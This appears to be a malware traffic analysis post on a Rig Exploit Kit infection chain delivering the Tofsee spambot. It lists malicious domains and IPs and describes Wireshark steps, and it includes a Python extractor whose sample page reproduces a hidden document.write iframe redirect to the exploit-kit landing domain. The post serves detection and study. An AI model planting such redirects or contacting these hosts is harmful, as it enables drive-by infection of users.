Rig Exploit Kit from 5.200.55.156 sends Tofsee SpamBot

ASSOCIATED DOMAINS:

93.114.65.96 – ac84.ro – Rig EK REDIRECT GATE
5.200.55.156 – ds.shengineeringmfg.com – Rig EK LANDING PAGE

SOME POST INFECTION TRAFFIC:

117.203.96.33 TCP PORT 8541 – POST INFECTION TRAFFIC
115.74.159.3 TCP PORT 7035 – POST INFECTION TRAFFIC
84.232.212.135 TCP PORT 1977 – POST INFECTION TRAFFIC
49.48.216.228 TCP PORT 5680 – POST INFECTION TRAFFIC


IMAGES and DETAILS:

Shown above: Compromised site redirecting to the Rig Exploit Kit (EK) redirect gate ac84.ro and then to the Rig EK landing page ds.shengineeringmfg.com.


Shown above: Index page from the compromised site, with the injected script that redirects to the Rig EK gate.


Shown above: Index page from the Rig EK redirect gate, showing a document.write “iframe” redirect to the Rig Exploit Kit landing page.


Shown above: The Rig EK redirect gate index page was extracted in Wireshark via File => Export Objects => HTTP, selecting packet 952 and saving it as an .htm file, which was then opened in a text editor. The same process was followed to extract the compromised site index page.
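Once the gate page has been exported this way, the document.write iframe redirect can be pulled out without rendering the page. The script below is an added example, not part of the original post; it scans an exported .htm for document.write() calls, joins concatenated string literals, resolves \xHH / \uHHHH / %xx / HTML-entity encodings, and returns the iframe src URLs. The sample page is constructed (only the landing domain is from this post; the paths are placeholders).

```python
import html
import re
from urllib.parse import unquote

# Constructed sample of a redirect-gate index page (not the real ac84.ro page):
# two document.write() calls, one built from concatenated literals with a \x escape,
# one wrapped in unescape() with %xx encoding. Paths are placeholders.
SAMPLE_GATE_PAGE = r'''<html><body>
<script>
document.write('\x3Cif' + 'rame src="http://ds.shengineeringmfg.com/?placeholder=1" width=1 height=1 style="visibility:hidden"></iframe>');
</script>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fds.shengineeringmfg.com%2Fplaceholder2%22%3E%3C%2Fiframe%3E"))</script>
</body></html>'''

# Argument list of each document.write(...) call (stops at the first closing paren).
_WRITE_CALL = re.compile(r"document\.write\s*\(\s*(.*?)\s*\)", re.IGNORECASE | re.DOTALL)
# A JavaScript string literal, keeping backslash escapes intact for decoding below.
_STRING_LIT = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1""", re.DOTALL)
# src attribute of an iframe tag in the decoded markup.
_IFRAME_SRC = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def decode_js_string(body):
    """Resolve \\xHH, \\uHHHH and simple backslash escapes in a JS string literal body."""
    def repl(m):
        esc = m.group(1)
        if esc[0] in "xu":
            return chr(int(esc[1:], 16))
        return {"n": "\n", "r": "\r", "t": "\t"}.get(esc, esc)
    return re.sub(r"\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|.)", repl, body)


def document_write_payloads(page_text):
    """Markup each document.write() call would inject, with concatenated literals joined."""
    payloads = []
    for call in _WRITE_CALL.finditer(page_text):
        pieces = [decode_js_string(m.group(2)) for m in _STRING_LIT.finditer(call.group(1))]
        if pieces:
            payloads.append("".join(pieces))
    return payloads


def iframe_redirects(page_text):
    """src URLs of iframes injected via document.write(), after %xx and HTML-entity decoding."""
    urls = []
    for payload in document_write_payloads(page_text):
        decoded = html.unescape(unquote(payload))
        urls.extend(m.group(1) for m in _IFRAME_SRC.finditer(decoded))
    return urls
```

Run it against a real export with `iframe_redirects(open("gate.htm", encoding="utf-8", errors="replace").read())`; each returned URL is a candidate landing page to compare against the HTTP requests in the capture.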


Shown above: Using the Wireshark filter “smtp” (Simple Mail Transfer Protocol) shows some of the spam mail traffic.


Shown above: Using the Wireshark filter (dns.flags.response == 0), which shows queries only, reveals some of Tofsee's post-infection DNS queries.


Shown above: Tofsee SpamBot executable file details.


MALICIOUS PAYLOAD ASSOCIATED WITH RIG EXPLOIT: